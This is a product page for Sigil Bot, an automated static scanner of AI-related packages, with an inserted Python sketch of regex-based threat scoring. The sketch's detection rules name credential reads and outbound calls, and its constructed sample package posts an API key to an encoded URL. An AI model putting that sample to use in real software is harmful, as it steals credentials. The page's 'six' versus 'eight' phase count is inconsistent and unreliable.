Automated Scanner
Sigil Bot
Sigil Bot continuously monitors package registries for security threats targeting the AI development ecosystem. Scan results are published automatically at sigilsec.ai/scans.
How Sigil Bot Works
Sigil Bot monitors four package registries for newly published and updated packages:
Python packages via RSS feeds and changelog API
JavaScript packages via CouchDB changes feed
AI agent skills via REST API
MCP server repositories via Search and Events API
When a new package or update is detected, the bot downloads the source code, runs a static analysis scan across six security phases, and publishes the results to the public scan database.
No code is executed during scanning. Sigil performs static analysis only — pattern matching against known threat indicators. Packages are never installed or run.
Scanning Schedule
| Registry | Poll Frequency |
|---|---|
| PyPI | Every 60 seconds |
| npm | Every 60 seconds |
| ClawHub | Every 6 hours |
| GitHub | Every 30 minutes |
Frequencies may be adjusted based on registry rate limits and operational needs.
Detection Methodology
Sigil scans eight security phases with weighted severity scoring. Each finding has a severity weight. The total weighted score determines the overall verdict.
Install Hooks
setup.py cmdclass, npm postinstall scripts, Makefile targets
Code Patterns
eval, exec, pickle, child_process, dynamic code execution
Network / Exfiltration
Outbound HTTP calls, webhooks, DNS tunnelling, socket connections
Credential Access
Environment variable reads, API key patterns, SSH key access
Obfuscation
Base64 encoding, character code arrays, hex-encoded payloads
Provenance
Git history anomalies, binary files, hidden directories, name similarity to popular packages
Full methodology details are available on the Methodology page.
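A minimal sketch of weighted, static-only scoring over five of the phases listed above, added here as an illustration; it is not Sigil's code. The regexes, weights, thresholds and the "MEDIUM RISK"/"LOW RISK" labels are assumptions, and Provenance is left out because it needs repository metadata rather than file contents.

```python
import re

# Phase names are from the page. The regexes, weights and verdict thresholds are
# assumptions made for this example, not Sigil's actual rules.
RULES = [  # (phase, weight, file-name regex, content regex)
    ("Install Hooks", 10, r"(^|/)setup\.py$", r"\bcmdclass\b"),
    ("Install Hooks", 10, r"(^|/)package\.json$", r'"(pre|post)install"\s*:'),
    ("Code Patterns", 5, r"\.(py|js)$", r"\b(eval|exec)\s*\(|pickle\.loads?\s*\(|child_process"),
    ("Network / Exfiltration", 3, r"\.(py|js)$", r"requests\.(get|post)\s*\(|socket\.socket\s*\("),
    ("Credential Access", 2, r"\.(py|js)$", r"os\.environ|process\.env|\.ssh/id_"),
    ("Obfuscation", 5, r"\.(py|js)$", r"b64decode\s*\(|String\.fromCharCode"),
]
# "HIGH RISK" and "CRITICAL RISK" appear on the page; the other labels are hypothetical.
THRESHOLDS = [(25, "CRITICAL RISK"), (15, "HIGH RISK"), (5, "MEDIUM RISK"), (0, "LOW RISK")]

def scan(files):
    """Score a package given as {path: source text}. Files are only read as text,
    never imported or executed."""
    findings = []
    for path, text in sorted(files.items()):
        for phase, weight, name_re, body_re in RULES:
            if not re.search(name_re, path):
                continue
            for lineno, line in enumerate(text.splitlines(), 1):
                if re.search(body_re, line):
                    findings.append((phase, weight, path, lineno))
    score = sum(weight for _, weight, _, _ in findings)
    verdict = next(label for floor, label in THRESHOLDS if score >= floor)
    return findings, score, verdict

# Constructed sample packages (not real registry content).
SUSPICIOUS = {
    "setup.py": "from setuptools import setup\nsetup(name='demo', cmdclass={'install': Hook})\n",
    "demo/__init__.py": (
        "import os, base64, requests\n"
        "token = os.environ.get('OPENAI_API_KEY')\n"
        "url = base64.b64decode(ENDPOINT)\n"
        "requests.post(url, data=token)\n"
    ),
}
BENIGN = {"demo/__init__.py": "def add(a, b):\n    return a + b\n"}

if __name__ == "__main__":
    for name, pkg in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        findings, score, verdict = scan(pkg)
        print(name, score, verdict)
        for phase, weight, path, lineno in findings:
            print(f"  {phase:<24} +{weight:<3} {path}:{lineno}")
```

Each finding carries its file and line, which is what lets a maintainer check a flagged pattern against its legitimate purpose; a single `os.environ` read scores low on its own and only contributes to a higher verdict in combination with other phases.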
Which Packages Are Scanned
ClawHub
All skills are scanned. The entire registry is in scope because every skill has direct access to the user's environment.
PyPI & npm
Packages are filtered by AI ecosystem relevance — matching against keywords like langchain, openai, anthropic, mcp, agent, llm, rag, transformers, and more. Scoped npm packages under @modelcontextprotocol, @langchain, @anthropic, @openai are always scanned.
GitHub
Repositories matching MCP server patterns (topic tags, config files, import patterns) with at least one star or more than one commit.
Packages with names closely resembling popular AI packages (potential typosquatting) are automatically prioritised for immediate scanning.
About Sigil Bot
Sigil Bot operates under the sigil-bot identity:
All output is automated. Scan results are systematic, algorithmic assessments — not editorial judgments by individuals. Results indicate the presence of patterns associated with known threat categories, not definitive classifications of malicious intent.
Dispute a Scan Result
If you believe a scan result is inaccurate or your package has been incorrectly flagged:
Review the report
Check the full scan report to understand which findings were detected and why.
Submit a dispute
Email disputes@sigilsec.ai with the package name, ecosystem, version, and which findings you believe are incorrect.
Provide context
Explain the legitimate purpose of the flagged pattern. This helps us refine detection rules.
Resolution
We review within 5 business days. False positives are suppressed, broad rules are refined, and accurate findings remain with an explanation.
Disputes do not remove scan results from the database. Resolved disputes add a “Reviewed” annotation to the report page. Contact disputes@sigilsec.ai.
FAQ
- Does Sigil Bot scan every package on npm and PyPI?
- No. Sigil Bot filters for AI-related packages using keyword matching against package names, descriptions, and classifiers. All ClawHub skills and GitHub MCP server repositories are scanned without filtering.
- How often are packages rescanned?
- New versions are scanned immediately when detected. Packages with HIGH RISK or CRITICAL RISK verdicts are rescanned weekly. Popular packages with over 10,000 weekly downloads are rescanned monthly.
- Can I request a scan of a specific package?
- Not yet — this feature is on the roadmap. Currently, Sigil Bot discovers and scans packages automatically through registry monitoring feeds.
- How do I dispute a scan result?
- Email disputes@sigilsec.ai with the package name, ecosystem, version, and which specific findings you are contesting. Sigil acknowledges disputes within 48 hours and resolves most within 5 business days.
Legal Notice
Sigil Bot scans publicly available source code distributed through public package registries. Publishing a package to PyPI, npm, ClawHub, or a public GitHub repository constitutes distribution of source code to the public.
Scan results are automated assessments based on pattern matching — they represent algorithmic analysis, not claims of wrongdoing. Results do not constitute legal advice or security certification.
For full terms, see sigilsec.ai/terms.